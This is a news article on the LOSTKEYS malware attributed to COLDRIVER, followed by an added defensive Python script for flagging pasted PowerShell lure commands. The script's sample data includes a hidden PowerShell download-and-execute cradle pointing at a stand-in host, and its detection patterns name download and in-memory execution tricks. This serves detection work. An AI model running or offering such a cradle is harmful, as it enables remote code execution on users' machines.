A new malware called LOSTKEYS, capable of stealing files and system data, has been identified by Google’s Threat Intelligence Group (GTIG) as part of a series of cyber-attacks attributed to COLDRIVER – a threat actor linked to the Russian government.

The malware, observed in attacks during January, March and April 2025, marks a new step in COLDRIVER’s evolving capabilities.

Previously known primarily for credential phishing targeting Western diplomats, NGOs and intelligence personnel, the group is now deploying more advanced malware tools to compromise victim devices directly.

“This is yet another example showing that credential theft is an ongoing area of risk, as even the strongest passwords can be captured by this kind of malware attack,” said Darren Siegel, lead sales engineer at Outpost24.

“While obviously the ideal outcome here would be to prevent such attacks from occurring in the first place, it underscores the need for organizations to implement continuous monitoring for compromised credentials.”

LOSTKEYS Multi-Stage Infection Chain

LOSTKEYS is delivered through a complex, three-stage infection process. It starts with a fake CAPTCHA on a lure website that tricks users into pasting and running a PowerShell script.

A second stage follows, designed to evade virtual machines by checking the MD5 hash of the screen resolution against a blocklist. The third stage downloads and decodes the final payload using a two-key substitution cipher and a Visual Basic Script decoder.
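A defender-side illustration of the first stage above, added here and not code from GTIG or the article: a small triage script that flags PowerShell launched from the interactive desktop shell with arguments typical of a pasted lure script. The Sysmon-style event shape, the sample command lines and the indicator patterns are constructed assumptions; the page publishes no LOSTKEYS command lines.

```python
import re

# Constructed sample events in a Sysmon-style process-creation shape (assumed layout).
# Only the first one is meant to resemble a pasted lure script; the rest are benign noise.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('https://lure.example/s')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ep bypass -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NonInteractive -Command Get-Service"},
]

# A user pasting into the Run dialog or a terminal yields explorer.exe as the parent.
INTERACTIVE_PARENTS = ("explorer.exe",)

# Indicator patterns (constructed heuristics, not signatures from the report).
SUSPICIOUS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution"),
    (re.compile(r"downloadstring|invoke-webrequest|\biwr\b|https?://", re.I), "remote download"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
]


def score_event(ev):
    """Return the indicator labels matched by one process-creation event."""
    if "powershell" not in ev["Image"].lower():
        return []
    parent = ev["ParentImage"].lower().rsplit("\\", 1)[-1]
    if parent not in INTERACTIVE_PARENTS:
        return []  # spawned by a service or agent: outside this heuristic's scope
    return [label for rx, label in SUSPICIOUS if rx.search(ev["CommandLine"])]


def find_suspects(events, min_indicators=2):
    """Indices of events reaching the indicator threshold, with their matched labels."""
    suspects = []
    for i, ev in enumerate(events):
        hits = score_event(ev)
        if len(hits) >= min_indicators:
            suspects.append((i, hits))
    return suspects


if __name__ == "__main__":
    for i, hits in find_suspects(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)}")
```

Requiring two indicators keeps routine admin scripts (the second event) below the threshold while the hidden, in-memory download cradle is flagged.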

GTIG’s analysis shows each infection chain is customized with unique identifiers and encryption keys, indicating a tailored approach for each target.

Beyond the group's routine credential theft, the deployment of malware such as LOSTKEYS is believed to be reserved for particularly high-value targets.

“There can be no doubt that intelligence gathering and cyber warfare are taking place at the nation-state level and will probably do so for the foreseeable future,” said Erich Kron, security awareness advocate at KnowBe4.

“This is simply the digital version of a spy sneaking in a micro camera and taking pictures of sensitive information.”

Investigators also uncovered earlier versions of LOSTKEYS dating back to December 2023.

These earlier samples masqueraded as files related to the software Maltego and used a different infection method. GTIG has not confirmed whether these samples were also deployed by COLDRIVER.

Protecting Potential Targets

GTIG urges at-risk users to enroll in Google’s Advanced Protection Program and enable Enhanced Safe Browsing in Chrome.

The group has added all malicious websites and files related to LOSTKEYS to Safe Browsing and has issued direct alerts to affected Gmail and Workspace users.

“We are committed to sharing our findings with the security community to raise awareness and with companies and individuals that might have been targeted by these activities,” GTIG stated.

“We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry.”